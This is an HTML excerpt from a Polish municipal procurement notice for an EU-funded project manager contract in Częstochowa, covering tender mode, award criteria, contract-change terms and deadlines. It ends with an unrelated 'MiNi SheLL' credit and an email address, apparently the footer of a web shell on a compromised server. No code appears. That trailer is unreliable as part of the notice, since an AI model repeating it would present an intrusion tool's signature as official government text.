<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istnieje możliwość dokonania zmiany osób wyszczególnionych w ust. 1 paragrafu 2 umowy oraz pozostałych osób przedstawionych w ofercie przetargowej, jedynie za uprzednią pisemną zgodą Zamawiającego.
Menadżer Projektu z własnej inicjatywy proponuje zmianę osób wyszczególnionych w ust. 1 paragrafu 2 umowy w następujących przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych;
b)	niewywiązywania się z obowiązków wynikających z umowy;
c)	jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Menadżera Projektu (np. rezygnacji, itp.).
W przypadku zmiany osób wyszczególnionych w ust. 1 paragrafu 2 umowy, nowe osoby powołane do pełnienia w/w obowiązków muszą spełniać wymagania określone dla danej funkcji.
Zamawiający może zażądać od Menadżera Projektu zmiany osób wyszczególnionych w ust. 1 paragrafu 2 umowy, jeżeli uzna, że nie wykonują należycie swoich obowiązków wynikających z umowy. Menadżer Projektu obowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przez Zamawiającego.
2. W przypadku urzędowej zmiany stawki podatku VAT, strony zobowiązują się do podpisania aneksu do umowy, regulującego wysokość podatku VAT.
3. Zamawiający przewiduje możliwość zmiany umowy w niżej opisanych przypadkach:
a) przedłużeniu terminu realizacji w przypadku aneksowania umowy na realizację inwestycji lub jej rozwiązaniu;
b) skróceniu terminu realizacji  umowy w przypadku skrócenia terminu realizacji inwestycji.
Dopuszcza się możliwość przedłużenia czasu pełnienia funkcji Menadżera Projektu w wyniku przesunięcia terminu i rozszerzenia zakresu robót w przypadku zaistnienia czynników niezależnych od stron, pod warunkiem uzyskania zgody Instytucji Zarządzającej RPO WSL  na wydłużenie terminu zakończenia rzeczowego i finansowego realizacji przedmiotowego Projektu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> e-mail: amarchewka@czestochowa.um.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2014 godzina 09:30, miejsce: Biuro Obsługi Interesanta w siedzibie zamawiającego, stanowisko Wydziału Nadzoru i Administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Priorytet 2. Społeczeństwo Informacyjne, Działanie 2.1. Infrastruktura społeczeństwa informacyjnego oraz z z budżetu 30 gmin. Projekt realizowany w ramach Programu Rozwoju Subregionu Północnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com